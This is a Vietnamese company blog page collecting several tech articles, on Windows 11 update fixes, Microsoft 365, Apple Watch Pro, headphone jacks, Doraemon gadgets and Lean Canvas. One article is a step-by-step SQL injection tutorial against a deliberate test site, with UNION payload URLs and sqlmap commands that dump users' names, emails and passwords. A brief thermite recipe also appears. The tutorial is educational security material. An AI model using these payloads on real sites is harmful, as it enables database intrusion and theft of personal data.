71/6 Củ Chi - Vĩnh Hải- Nha Trang
02583.835083
Thứ Hai-Thứ Bảy: 07:30 - 17:00
12 Nov 2022

Cách khắc phục lỗi tải Windows 11 22H2 bị kẹt ở 0 hoặc 100%

Nếu bạn bị kẹt khi tải bản cập nhật Windows 11 22H2 thì bài viết này của Quản Trị Mạng sẽ giúp bạn giải quyết vấn đề.

Rất hiếm khi bạn thấy quá trình tải hoặc cài đặt bản cập nhật Windows bị kẹt, không có tiến triển gì. Thường thì bạn sẽ bị kẹt ở mức 40%, 70% hoặc tệ nhất là 99%. Đây là một vấn đề khá phiền nhiễu và để khắc phục bạn có thể tham khảo các giải pháp dưới đây.

Có một vài yếu tố khiến Windows 11 22H2 bị kẹt ở 0 hoặc 100% trong khi tải. Vấn đề có thể nằm ở kết nối internet, hết dung lượng lưu trữ hoặc bị ảnh hưởng bởi các phần mềm firewall…

Cách khắc phục lỗi tải Windows 11 22H2 bị kẹt ở 0 hoặc 100%

Cách khắc phục lỗi tải Windows 11 22H2 bị kẹt ở 0 hoặc 100%

1. Chạy Windows Update Troubleshooter

Cách đầu tiên mà bạn có thể thử đó là chạy trình gỡ lỗi Windows Update Troubleshooter được tích hợp sẵn. Nó có thể giúp bạn tìm ra vấn đề trong khi tải và cài đặt Windows.

Để chạy công cụ này, bạn cần truy cập Settings > System > Troubleshoot > Other Troubleshooters và nhấn vào nút Run bên cạnh tùy chọn Windows Update. Windows Update Troubleshooter sẽ bắt đầu chẩn đoán hệ điều hành của bạn để tìm các vấn đề liên quan tới cập nhật. Trong trường hợp tìm ra vấn đề, nó sẽ tự khắc phục luôn.

2. Xóa cache Windows Update

Xóa cache Windows Update

Xóa bộ nhớ cache Windows Update cũng có thể giúp khắc phục lỗi cập nhật của Windows 11/10, khi mà Windows Update bị kẹt lúc tải bản cập nhật.

Để xóa cache Windows Update thì trước hết bạn cần phải dừng dịch vụ Windows Update sau đó xóa toàn bộ nội dung trong thư mục Software Distribution và khởi động lại dịch vụ.

  • Nhấn Win + R, nhập services.msc rồi nhấn Enter.
  • Trong cửa sổ Services, tìm và nhấn chuột phải vào dịch vụ Windows Update để chọn Stop.
  • Tiếp theo, mở File Explorer (phím tắt Win + E) rồi truy cập C:\Windows\SoftwareDistribution\Download, nhấn Ctrl + A để chọn tất cả các file và thư mục.
  • Nhấn vào biểu tượng thùng rác để xóa tất cả file và thư mục đã chọn.
  • Bây giờ bạn truy cập lại services.msc để khởi động lại dịch vụ Windows Update, nhấn chuột phải vào Windows Update rồi chọn Start.

3. Kích hoạt dịch vụ Windows Modules Installer

Kích hoạt dịch vụ Windows Modules Installer

Windows Modules Installer, còn được biết đến với tên gọi Windows Modules Installer Worker (WMIW), là một thành phần cốt lỗi của Microsoft với khả năng tự động kiểm tra các bản cập nhật cần thiết và cài đặt chúng trên máy tính Windows 11/10 của bạn. Nếu Windows Modules Installer bị vô hiệu hóa, bạn sẽ gặp vấn đề khi cài đặt các bản cập nhật.

  • Để xem dịch vụ này có bị tắt hay không bạn mở Task Manager sau đó chuyển sang thẻ Services.
  • Nhấn chuột phải vào Windows Modules Installer và chọn Open Services.
  • Trong cửa sổ Services, tìm và nhấn chuột phải vào Windows Modules Installer và chọn Properties.
  • Bạn hãy nhìn ở phần Startup type xem nó đang ở trạng thái nào. Nếu nó đang ở Disabled thì bạn cần chuyển nó sang Manual, trạng thái mặc định của Windows và sau đó nhấn vào nút Start để chạy dịch vụ này.
  • Bây giờ, bạn hãy thử thực hiện lại việc tải và cài đặt bản cập nhật.

4. Tải bản cập nhật bằng Windows 11 Installation Assistant

Windows 11 Installation Assistant là một trong nhiều cách mà bạn có thể dùng để cài đặt bản cập nhật tính năng Windows. Nếu như hệ thống của bạn không nhận được bản cập nhật hoặc bị kẹt khi tải bản cập nhật, bạn có thể dùng Installation Assistant để khắc phục vấn đề.

Bạn phải tải Installation Assistant từ trang tải phần mềm của Microsoft. Tải về xong, bạn nhấn đúp vào file thực thi để chạy chương trình. Bạn nhấn vào nút Accept and Install và đồng ý cho Installation Assistant cài đặt bản cập nhật tính năng trên máy của bạn. Nhấn vào nút Restart Now để hoàn thành cài đặt bản cập nhật.

5. Sử dụng Media Creation Tool để tải file ISO

Cuối cùng, bạn có thể sử dụng Media Creation Tool để tải về file cài đặt bản cập nhật Windows định dạng ISO rồi tiến hành cài đặt.

Tại sao quá trình tải Windows 11 của tôi lại bị kẹt ở 100%?

Bị kẹt ở 100% là vấn đề phổ biến khi cập nhật Windows, không có gì xảy ra cho dù bạn đã chờ vài tiếng. Trong hầu hết trường hợp, lý do có thể là nguồn điện có trục trặc hoặc kết nối internet gặp vấn đề. Lý do khác có thể là do lỗi RAM, file download bị hỏng hoặc phần mềm tường lửa chặn cài đặt bản cập nhật…

Tôi có thể làm gì nếu quá trình cập nhật Windows 11 bị kẹt?

Nếu bạn bị kẹt khi đang tải về bản cập nhật tính năng của Windows 11, bạn có thể thử kết nối với mạng internet khác hoặc tạm thời vô hiệu hóa tường lửa xem có khắc phục được lỗi hay không. Nếu không, bạn có thể thử chạy Windows Update Troubleshooter, kích hoạt Windows Modules Installer và xóa cache Windows Update… Bạn cũng có thể thử chạy công cụ DISM để khắc phục file hệ thống cập nhật bị lỗi.

21 Oct 2022

Microsoft lần đầu hé lộ ứng dụng Microsoft 365

Tại sự kiện thường niên Ignite 2022, Microsoft đã công bố rất nhiều tính năng mới cho người dùng Microsoft 365. Thế nhưng điều khiến cho người dùng thích thú nhất lại là tuyên bố một ứng dụng Microsoft 365 mới sẽ được ra đời để thay thế cho ứng dụng Office hiện tại.

Giờ đây, nhiều ngày sau công bố đó, Microsoft cuối cùng cũng hé lộ một chút về giao diện, chức năng của ứng dụng Microsoft 365.

Kênh YouTube Microsoft 365 vừa đăng tải một video cho thấy một số tính năng chính của ứng dụng. Bên cạnh việc hiển thị giao diện mới và biểu tượng mới, video nói về cách Microsoft 365 trở thành một trung tâm cho tất cả tài liệu, bản trình bày và file của bạn trên tất cả các ứng dụng, bao gồm cả nội dung của bên thứ ba.

 

 

Do video có độ dài chỉ 55 giây nên không thể cho chúng ta thấy hế được mọi thứ sẽ có trên ứng dụng Microsoft 365. Tuy nhiên, nó nêu bật một số tính năng tốt. Chúng bao gồm những thứ sau:

  • Khả năng tìm kiếm và tìm các file được chia sẻ bởi những người cụ thể
  • Tạo nội dung mới với sự trợ giúp của các mẫu được thiết kế sẵn
  • Tất cả các ứng dụng Microsoft, ứng dụng của bên thứ ba và ứng dụng của công ty bạn đều có thể được tìm thấy
  • Trang Feed sẽ giúp bạn chuẩn bị cho cuộc họp sắp diễn ra, xem thông tin cập nhật từ những người bạn theo dõi…
  • Đề xuất được cá nhân hóa do Microsoft Graph cung cấp
  • Truy cập nhanh vào tất cả các file gần đây của bạn
Hiện Microsoft đã có những động thái đầu tiên nhằm chuẩn bị cho việc chuyển đổi. Ứng dụng Office trên Google Play Store vừa được đổi tên thành Office (Microsoft 365). Tuy nhiên, nó chưa cung cấp tất cả các tính năng mới được nêu trong video.

Trong buổi công bố, Microsoft cho biết Office.com, ứng dụng Office dành cho thiết bị di động và ứng dụng Office dành cho Windows sẽ trở thành ứng dụng Microsoft 365 trong những tháng tới. Dẫu vậy, thời điểm cụ thể vẫn chưa được Microsoft tiết lộ.

Theo quantrimang.com

07 Sep 2022

So sánh Apple Watch Pro với thế hệ trước khiến dân tình phát sốt bởi sự thay đổi siêu hấp dẫn

Những tin đồn gây đây cho biết Apple Watch Pro dự kiến ​​sẽ có kích thước lớn hơn Apple Watch Series 7 và phần còn lại của các mẫu dòng Apple Watch 8 sắp tới. Chuyên gia rò rỉ Sonny Dickson mới đây đã chia sẻ những hình ảnh so sánh trực quan kích thước tuyệt vời của dòng sản phẩm mới.

Theo nguồn tin của Dickson, Apple Watch Pro sẽ có kích thước vỏ 49mm – lớn hơn so với tin đồn trước đó cho thấy từ 47mm đến 48mm. Để so sánh, Apple Watch Series 7 có các kích thước vỏ 41mm và 45mm và dự kiến ​​Apple Watch 8 cũng có hai phiên bản như vậy.

Kết hợp với màn hình phẳng, kích thước vỏ 49mm lớn hơn cho Apple Watch Pro có thể mang đến màn hình thậm chí còn lớn hơn 1,99 inch được đồn ban đầu và thậm chí có thể lớn đến 2 inch trở lên. Như vậy có thể thấy màn hình Apple Watch sẽ lớn chưa từng thấy.

Bất kể kích thước màn hình của Apple Watch Pro như thế nào nó cũng sẽ cung cấp nhiều diện tích hiển thị hơn cho các vận động viên và những người đam mê thể dục để hiển thị các số liệu thống kê thể trạng phù hợp.

Đầu tuần này, 91Mobiles đã chia sẻ hình ảnh CAD về thiết kế mới của Apple Watch Pro và cũng tuyên bố kích thước vỏ 49mm tương tự. Các hình ảnh rò rỉ từ nguồn này cũng xác nhận việc Apple Watch bao gồm một nút vật lý mới ở phía bên trái của đồng hồ được thiết kế lại, màn hình phẳng hoàn toàn và phần nhô ra chứa nút Digital Crown và Side.

Apple Watch Pro mới sẽ đứng đầu trong dòng sản phẩm Apple Watch, với giá dự kiến ​​sẽ rơi vào khung giá từ 900 USD đến 1.000 USD. Apple dự kiến ​​sẽ công bố Apple Watch “Pro” hoàn toàn mới trong một sự kiện vào thứ Tư, ngày 7 tháng 9. Apple Watch cao cấp mới sẽ đi kèm Apple Watch Series 8 mới và Apple Watch SE giá rẻ hơn.

Theo techz.vn

22 Aug 2022

Sau 7 năm, Apple đã đúng khi khai tử jack tai nghe 3.5mm

Sau 7 năm, kết cục của jack cắm tai nghe 3.5mm trên thiết bị di động đã trở nên rõ ràng hơn bao giờ hết. Apple là người tiên phong khai tử cổng cắm này và quyết định điều gì có thể xảy ra tiếp theo.

Sau 7 năm, Apple đã đúng khi khai tử jack tai nghe 3.5mm 

Apple đã lần đầu loại bỏ jack cắm tai nghe 3.5mm trên iPhone 7, ra mắt từ năm 2016, và công ty cũng đã dần thực hiện điều đó với những sản phẩm tiêu dùng chính của mình. Dù hứng chịu vô số chỉ trích ban đầu, thế nhưng, một số công ty khác đã chọn làm theo. Apple vẫn còn một vài sản phẩm giữ lại jack cắm tai nghe trong dòng sản phẩm của mình, nhưng các tin đồn gần đây gợi ý rằng số thiết bị mà Apple thiết kế còn cổng 3.5mm sẽ giảm xuống hơn nữa trong thời gian tới.

Jack cắm tai nghe 3.5mm xuất hiện từ thế kỉ 19, và dần dần phổ biến trên nhiều thiết bị, từ máy nghe nhạc, PC cho đến điện thoại. Đáng tiếc thay, Apple đã giết chết tiêu chuẩn này trên chính sản phẩm kiếm ra nhiều tiền nhất của mình, đó là iPhone.

Sau 7 năm, Apple đã đúng khi khai tử jack tai nghe 3.5mm 

Kể từ khi iPhone 7 xuất hiện, những thế hệ đàn em cũng chẳng còn jack cắm tai nghe 3.5mm. Ban đầu, Apple còn tặng kèm bộ chuyển đổi để người dùng có thể kết nối tai nghe có dây hoặc những phụ kiện khác, thế nhưng, sau đó, công ty cũng quyết định ngừng thực hiện điều này, dù cũng có nhiều lời chỉ trích và phản đối từ giới công nghệ. Nhà Táo tiếp tục loại bỏ jack cắm tai nghe trên các sản phẩm khác của mình, bắt đầu từ năm 2018. iPad Pro tái thiết kế ra mắt trong năm đó chính là chiếc tablet đầu tiên của Apple thiếu vắng đi jack cắm tai nghe. Giờ đây, iPad giá rẻ là dòng tablet duy nhất còn lại cổng cắm tai nghe 3.5mm.

Và theo các thông tin gần đây, điều đó có thể sẽ sớm thay đổi. Các tin đồn hiện tại cho thấy chiếc iPad thế hệ 10 sắp tới của Apple cuối cùng cũng sẽ không còn jack cắm “già cỗi này”, buộc người dùng phải lựa chọn những cách khác để có thể nghe nội dụng trên những thiết bị của mình, hoặc đơn giản là sử dụng các bộ chuyển đổi (adapter).

Các nhà sản xuất bên thứ ba

Ngay sau khi khai tử jack cắm tai nghe, các đối thủ của Apple nhanh chóng chế nhạo nhà Táo, thậm chí còn chạy quảng cáo để chọc ngoáy quyết định này. Thế nhưng, đến cuối cùng, hầu hết các đối thủ lớn khác của Apple đều đã chọn cách đi theo con đường này.

Samsung là công ty thường xuyên chế nhạo Apple và tung ra nhiều quảng cáo chỉ trích việc loại bỏ jack cắm tai nghe trên iPhone. Tuy nhiên, Samsung cuối cùng lại làm theo, và bắt đầu với Galaxy Note 10 và Galaxy S20, công ty Hàn Quốc đã quyết định loại bỏ jack cắm 3.5mm trên những thiết bị flagship của mình. Hơn thế nữa, Samsung còn âm thầm xóa bỏ những quảng cáo chế giễu quyết định thiết kế của Apple trong quá khứ.

Sau 7 năm, Apple đã đúng khi khai tử jack tai nghe 3.5mm 

Tương tự, Google cũng đã chế nhạo Apple vì loại bỏ jack cắm tai nghe iPhone. Gã khổng lồ tìm kiếm đã tung ra một đoạn video nhái lại Apple để quảng cáo rằng Google Pixel 5a vẫn có jack cắm tai nghe. Dẫu thế, một năm sau khi phát hành Google Pixel 5a (và video chế nhạo Apple), Google cuối cùng cũng đã loại bỏ jack cắm tai nghe ra khỏi Google Pixel 6a.

Không chỉ Samsung hay Apple, điều này còn diễn ra đối với hầu hết các thương hiệu Android. Dẫu không phải mọi công ty đều công khai chế nhạo Apple vì đã loại bỏ jack cắm tai nghe, nhưng phần lớn các thương hiệu smartphone chọn đi theo con đường đó.

Tranh cãi nảy lửa

Vào thời điểm đó, Apple đã biện minh cho việc loại bỏ jack cắm tai nghe rằng Lightning là một tiêu chuẩn âm thanh tốt hơn về tổng thế. Bên cạnh đó, công ty cũng tuyên bố rằng việc loại bỏ tiêu chuẩn này cũng tạo ra nhiều không gian cho những linh kiện lớn hơn hoặc linh kiện bổ sung.

Tuy vậy, cả ngành công nghệ lại hoài nghi rằng việc Apple loại bỏ jack cắm tai nghe là vì tiền. Xét cho cùng, vào thời điểm thiết bị này được phát hành, thương hiệu  Beats by Dre của Apple đã chiếm gần một nửa doanh số bán tai nghe Bluetooth,

Thậm chí, Apple còn gần như công khai loại bỏ jack cắm tai nghe để bán tai nghe không dây. Sau khi trình làng dòng smartphone mới này, Apple ngay lập tức tung ra AirPods.

Sau 7 năm, Apple đã đúng khi khai tử jack tai nghe 3.5mm 

Nhìn lại sự thành công vượt bậc của AirPods và những sản phẩm true wireless khác, thật khó để chúng ta lập luận rằng Apple đã sai khi thực hiện điều này.

Tuy nhiên, ngoài việc mở ra tương lai không dây, Apple còn thúc đẩy thị trường smartphone nói chung. Đã có rất nhiều tiến bộ về công nghệ trên smartphone ngày nay một phần xuất phát từ việc loại bỏ tiêu chuẩn cũ kỹ.

Các lựa chọn thay thế từ Apple

Trong nhiều trường hợp, có nhiều lựa chọn nghe âm thanh tốt hơn so với tai nghe có dây. Những thiết bị true wireless như AirPods thực sự rất tiện lợi, dễ dàng và không bị vướng trong túi của bạn như tai nghe tiêu chuẩn. Ngay cả khi AirPods quá đắt đỏ đối với một số người, vẫn có rất nhiều lựa chọn Bluetooth trên thị trường có mức giá phải chẳng hơn.

Với iPad, cũng chẳng có lý do gì để Apple giữ lại jack cắm tai nghe, đặc biệt khi xét đến cách mà hầu hết mọi người sử dụng tablet. Đây không phải là cỗ máy được sử dụng cho những công việc cần đến tai nghe có dây. Trên máy Mac, vốn thực sự được sử dụng cho những công việc âm thanh và hình ảnh chuyên nghiệp, chúng vẫn có jack cắm tai nghe.

Hơn nữa, người dùng thực sự cần đến những tai nghe studio có dây, vốn không có độ trễ, trên iPhone và iPad có thể giải quyết vấn đề đó với một phụ kiện có giá khoảng 200.000 đồng, dù có lẽ hơi vướng víu và phiền phức một chút.

Dĩ nhiên, cũng có những tranh luận cho rằng việc giữ jack cắm tai nghe 3.5mm lại là một giải pháp đơn giản và rẻ cho các công ty cũng như người tiêu dùng. Đối với những công việc liên quan đến âm thanh và video, một jack tai nghe 3.5mm kết hợp cùng với tai nghe trở kháng cao cũng mang đến độ trễ thấp và âm thanh rõ ràng hơn.

Tuy nhiên, những mặt tích cực đó không vượt trội hơn sự tiện lợi mà Apple mang lại từ việc loại bỏ jack cắm tai nghe. Rõ ràng, hầu hết mọi công ty đều cảm thực hiện điều tương tự Apple, chỉ là họ mất nhiều thời gian hơn để thực hiện ý tưởng đó.

17 Aug 2022

Những bảo bối của Doraemon đã trở thành sự thật sau hàng chục năm, giấc mơ ngày thơ bé hóa ra chẳng phải viển vông

Chú mèo máy Doraemon không chỉ là người bạn thân nhất của cậu bé hậu đậu Nobita mà còn là bạn thân của biết bao thế hệ trẻ em từ 8X, 9X cho đến cả 10X. Mèo Ú đáng yêu không chỉ tốt bụng, dễ thương mà còn có chiếc túi thần kỳ chứa đầy bảo bối vô tận.

  - Ảnh 1.

Trong túi thần kỳ của Doraemon chứa cả tuổi thơ cả bao thế hệ

Những món bảo bối của Doraemon vào 20 năm trước đều là những món đồ viễn tưởng cảu tác giả Fujiko F. Fujio. Thế nhưng 20 năm sau, vào thời hiện đại, rất nhiều bảo bối trong số đó đã trở thành sự thật một cách tình cờ!

1. Xe tự lái

Vào thời Nobita, Suneo, Shizuka,… vẫn còn là học sinh lớp 3E thì chiếc xe ô tô có thể tự chạy, tự điều khiển chính mình chính là một phép màu. Thế nhưng bước sang năm 2022, khái niệm xe tự lái đã trở nên quá đỗi bình thường. Rất nhiều các hãng xe đình đám như Tesla, Mercedes, Nissan,… đều đã ra mắt công nghệ xe tự lái thông minh từ nhiều năm trước. Tuy nhiên, tính an toàn và chính xác của chúng thì rõ ràng chưa thể đảm bảo 100% như bảo bối của chú mèo máy đến từ thế kỷ 22.

  - Ảnh 2.
  - Ảnh 3.

2. Máy in 3D

  - Ảnh 4.

Là fan hâm mộ thứ thiệt của Doraemon thì chắc chắn thể quên được món bảo bối thú vị này. Nó từng xuất hiện trong vài tập truyện lẫn hoạt hình với nhiệm vụ là có thể xây dựng ngay lập tức dưới dạng 3D các đồ vật được vẽ trong hình mẫu.

Máy in 3D trong thế giới thực hiện nay phức tạp hơn một chút so với cỗ máy trong Doraemon. Để có thể in ra hình khối 3D, chúng ta vẫn phải nhập tất cả thông tin và chi tiết vào thiết bị chứ không chỉ đưa hình ảnh là được. Sản phẩm công nghệ này vẫn đang được phát triển và được kỳ vọng sẽ hoàn thiện hơn nữa trong tương lai.

  - Ảnh 5.

3. Công nghệ chụp ảnh lấy ngay

  - Ảnh 6.

Biết bao đứa trẻ trên thế giới từng trầm trồ với chiếc “dao rạch” của Doreamon có thể cắt lấy khung hình thành ngay bức ảnh. Vào thời bấy giờ, chiếc máy ảnh còn là một sản phẩm xa xỉ không phải ai cũng có thì đây rõ ràng là món bảo bối viển vông trong tâm trí người đọc mà thôi.

Thế nhưng giờ đây, chúng ta đều đã quen thuộc với chiếc máy ảnh Polaroid với khả năng chụp ảnh lấy liền. Bên cạnh đó, người ta cũng đã phát minh ra những máy in ảnh trực tiếp, có thể xuất ảnh từ điện thoại thông minh, máy ảnh luôn và ngay một cách dễ dàng.

  - Ảnh 7.

4. Cây mọc tức thì

  - Ảnh 8.

Bảo bối này giống như “mì cốc trên cây”. Bạn đổ nước nóng vào đất rồi đợi vài phút là sẽ có ngay một cây thông Noel mọc ra từ đó. Bảo bối này nghe thì có vẻ đi ngược lại quy luật phát triển tự nhiên của thực vật nhưng đã thực sự được phát minh ra ngoài đời.

Với loại cây mọc tức thì bản đời thật, chúng ta thậm chí còn không cần tưới nước nóng vào. Tất cả những gì bạn cần làm là dựng giá đỡ và kéo cây lên theo đúng nghĩa đen. Nhưng bù lại, nó không phải cây thật mà là đồ trang trí nhân tạo mà thôi.

5. Lửa trại dưới nước

  - Ảnh 9.

Lửa trại dưới nước trong Doraemon đúng như tên gọi của nó là có thể cháy bình thường dưới nước. Nhờ thế mà mọi người có thể thoải mái khám phá, chơi đùa dưới đáy biển mà không sợ tăm tối.

Phiên bản đời thực của món bảo bối nghe rất vô lý này đã xuất hiện và có tên là Thermite (nhiệt nhôm). Đây là một chất được làm bằng hỗn hợp 50% bột nhôm và 50% rỉ sét. Bạn sẽ cần một dải magiê để thắp sáng nó. Một khi Thermite cháy, nó sẽ cháy mãi ngay cả khi ở dưới nước!

  - Ảnh 10.

6. Ứng dụng chỉ đường theo yêu cầu

Ngày nay, chúng ta đã quen sử dụng Google Maps hay các ứng dụng tương tự mỗi ngày để di chuyển được đến đúng đích muốn đến. Thế nhưng cỡ 30 năm trước, khi họa sĩ Fujio F. Fujio sáng tạo ra bảo bối chỉ đường trong Doraemon, người đọc cảm thấy đây là một bảo bối phép màu và rất xa lạ, chỉ có thể có trong truyện mà thôi. Thế mới thấy công nghệ và khoa học đã phát triển nhanh chóng như thế nào!

  - Ảnh 11.
29 Jul 2022

Hướng dẫn khai thác lỗi SQL Injection cơ bản

Tấn công SQL injection có thể xảy ra khi một trang web cho người dùng thực thi câu lệnh SQL ngay trên trang Web hoặc thanh địa chỉ. Trong bài này, mình sẽ trình bày cách thực hiện một cuộc tấn công SQL Injection cơ bản trên một trang web và ở phần cuối, mình sẽ nói về công cụ SQLmap, công cụ này sẽ tự động hóa toàn bộ quy trình.

Cách để thực hiện một cuộc tấn công SQL Injection cơ bản

Trang web http://testphp.vulnweb.com/listproducts.php?cat=1 đang kiểm tra các lỗ hổng php. Mình sẽ sử dụng trang web này để thực hiện cuộc tấn công SQLi.

Cách để thực hiện một cuộc tấn công SQL Injection cơ bản

1. Tìm xem trang web có dễ bị tấn công SQL Injection hay không

Cách cơ bản và đơn giản nhất là kiểm tra URL của các trang bạn đang truy cập. Nếu URL có dạng http://testphp.vulnweb.com/listproducts.php?cat=1, nó là một mục tiêu tiềm năng. Để kiểm tra xem trang web có thực sự đang sử dụng SQL hay không, bạn có thể thêm \ hoặc một dấu ngoặc kép ” hoặc dấu ngoặc đơn ‘ ở cuối URL và xem liệu có gì trong trang thay đổi hoặc bạn gặp lỗi SQL hay không. Đối với hầu hết các trường hợp, lỗi sẽ như sau:

Nhưng lỗi cũng có thể là bất cứ điều gì khác. Đối với trang web http://testphp.vulnweb.com/listproducts.php?cat=1 khi mình thêm dấu ‘ ở cuối sẽ xuất hiện lỗi:

Hướng dẫn khai thác lỗi SQL Injection cơ bản 37

Vì vậy, mình đã kết luận rằng trang web này có thể bị tấn công SQL Injection http://testphp.vulnweb.com/listproducts.php?cat=1

Trong backend, ứng dụng có thể đang chạy một truy vấn tương tự như

SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'

Truy vấn được thực thi cho http://testphp.vulnweb.com/listproducts.php?cat=1′ sẽ là

SELECT * FROM XYZ_TABLE WHERE CAT=1'

Và bạn đã đoán đúng. Lệnh này sẽ tạo ra lỗi.

Chúng ta có thể sửa đổi truy vấn theo bất kỳ cách nào chúng ta muốn. Nếu mình thêm --+ vào cuối, truy vấn sẽ chạy mà không có lỗi. (--+ hoặc # về cơ bản sẽ comment bất kỳ thứ gì sau nó)

2. Tìm các Database hiện có

Bước tiếp theo sẽ là tìm hiểu các database – cơ sở dữ liệu hiện có. Chúng ta sẽ sử dụng ORDER BY. Nếu mình chạy http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, truy vấn MySQL tương ứng sẽ là

SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'

Điều này sẽ sắp xếp kết quả dựa trên cột thứ 5

Mình sẽ lặp lại quá trình này với số cột khác nhau cho đến khi mình nhận được số cột mà trang ngắt. Ví dụ: trong trường hợp này khi ORDER BY 12, trang sẽ bị ngắt. Bây giờ mình biết rằng tổng số cột là 11. Vì số cột là 11, nên mình sẽ chạy truy vấn select all 1,2,3,4,5,6,7,8,9,10,11.

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11

Truy vấn MySQL tương ứng sẽ trông như này

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11

Bây giờ điều hướng đến trang web. Ở một số nơi, bạn sẽ tìm thấy một số từ 1 đến 11. Mình thấy số 7, 2 và 9.

Hướng dẫn khai thác lỗi SQL Injection cơ bản 38

Bây giờ mình biết rằng bất cứ thứ gì mình viết ở vị trí 7, 2 và 9 sẽ được hiển thị. Mình muốn current databaseuser vàversion, vì vậy mình sẽ thực thi

https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,user(),3,4,5,6,database(),8,version(),10,11 .

Lưu ý:%20 là ASCII cho space

Mình đã thay thế 2 bằng user(), 7 bằng database() và 9 bằng version().

Hướng dẫn khai thác lỗi SQL Injection cơ bản 39

Mình nhận được thông tin sau:

  • database — acuart
  • user — acuart@localhost
  • version — 8.0.22–0ubuntu0.20.04.2

3. Tìm Table và dữ liệu trong Table trong Database hiện tại

Một khi thông tin trên được thu thập, mọi thứ sẽ rất đơn giản. Để có được danh sách các bảng, mình sẽ chạy

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema%20=%27acuart%27

Truy vấn SQL tương ứng:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema = 'acuart'

information_schema là cơ sở dữ liệu mặc định chứa danh sách các bảng. Chúng ta sẽ sử dụng thông tin này để tìm ra tên bảng. acuart là tên cơ sở dữ liệu mà chúng ta nhận được từ bước trước.

Trang web sẽ giống như sau:

Hướng dẫn khai thác lỗi SQL Injection cơ bản 40

Chúng ta có một danh sách các bảng Table:

  • artists
  • carts
  • categ
  • featured
  • guestbook
  • pictures
  • products
  • users

4. Khám phá tên cột – Column trong Table

Khám phá các cột của bảng (column trong Table) users

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns where table_name=’users’

Truy vấn SQL tương ứng:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name = 'users'

Hướng dẫn khai thác lỗi SQL Injection cơ bản 41

Mình nhận được các tên cột là:

  • uname
  • pass
  • cc
  • address
  • email
  • name
  • phone

5. Tìm dữ liệu được lưu trữ trong Table

Để xem tên, email, mật khẩu của người dùng:

http://testphp.vulnweb.com/listproducts.php?cat=1%20union select all 1,name,3,4,5,6,email,8,pass,10,11 from users

Truy vấn SQL tương ứng:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users

Hướng dẫn khai thác lỗi SQL Injection cơ bản 42

6. Sử dụng SQLmap để tấn công SQL Injection tự động

Nếu mình muốn sử dụng sqlmap để thực hiện việc trên, mình sẽ phải chạy các lệnh sau trên terminal của mình

  • sqlmap -u https//testphp.vulnweb.com/listproducts.php?cat=" --dbs để lấy danh sách cơ sở dữ liệuHướng dẫn khai thác lỗi SQL Injection cơ bản 43
  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db: lấy cơ sở dữ liệu hiện tạiHướng dẫn khai thác lỗi SQL Injection cơ bản 44
  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart: lấy danh sách các bảng trong ‘acuart’Hướng dẫn khai thác lỗi SQL Injection cơ bản 45
  • sqlmap -u"http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart: lấy các cột trong bảng ‘users’Hướng dẫn khai thác lỗi SQL Injection cơ bản 46
  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"-T users -D acuart --dump: lưu trữ tất cả dữ liệu trong bảng users

Tóm tắt về tấn công SQL Injection

Cuộc tấn công SQL Injection là một trong những cuộc tấn công mạnh mẽ nhất mà hacker có thể thực hiện. Có nhiều cách để ngăn chặn SQL Injection, bạn có thể tham khảo tại đây.

25 Jul 2022

LeanCanvas – Lập kế hoạch kinh doanh trên một trang giấy thần dược cho startup

Tổng quan Lean Canvas là gì?

­­­­­Không cần đến một bản kế hoạch kinh doanh dài vài chục trang giấy và có thể ngốn của bạn vài tuần để hoàn thành, #LeanCanvas là mô hình giúp bạn có thể xây dựng hoặc phân tích một mô hình kinh doanh trên một trang giấy trong khoảng 20 – 30 phút. Thay vì lập ra một bản-kế-hoạch-hoàn-hảo ngay từ lần đầu hạ bút thì Lean Canvas hướng đến việc phát triển liên tục thông qua các bài kiểm tra thường xuyên và nhanh chóng các giả thiết ban đầu với thực tế trên thị trường và khách hàng. Lean Canvas là một phiên bản biến thể được Ash Maurya phát triển từ mô hình Business Model Canvas do Alexander Osterwalder đưa ra trong cuốn sách nổi tiếng có tên Business Model Generation.  Khác với mô hình Business Model Canvas được áp dụng  rộng rãi cho cả các doanh nghiệp mới và cũ (tham khảo mô hình Business Model Canvas của FacebooK và google tại đây) thì  Lean Canvas tập trung vào việc tiếp cận  từ khía cạnh tìm và giải quyết vấn đề nhằm phục vụ cho các đối tượng chính là các doanh nhân khởi nghiệp.

Lean Canvas được chia sẻ lần đầu trong một bài viết trên blog của tác giả có tên “How to Document your business Model On 1 Page” (tạm dịch: làm thể nào để lập mô hình kinh doanh trên một trang giấy) sau đó được trình bày đầy đủ trong cuốn Running Lean.

Các thành phần của một bảng Lean Canvas

Mô hình Lean Canvas được thúc đẩy bởi những phản hổi từ thị trường và triết lý của nó tập trung chủ yếu vào những việc không ngừng hoàn thiện để có được sản phẩm khả dụng tối thiểu tiếp theo. Phương pháp tinh gọn (Lean Methodology) phù hợp với startup bởi vì nó khuyến khích các doanh nhân khởi nghiệp trình bày rõ ràng các vấn đề và tránh tạo ra những sản phẩm sai và không cần thiết.

Nếu bạn muốn tạo 1 bảng Lean Canvas cho các ý tưởng có tính cạnh tranh của mình thì bạn cần hoàn thành 9 yếu tố sau đây trong bảng kế hoạch kinh doanh đó:

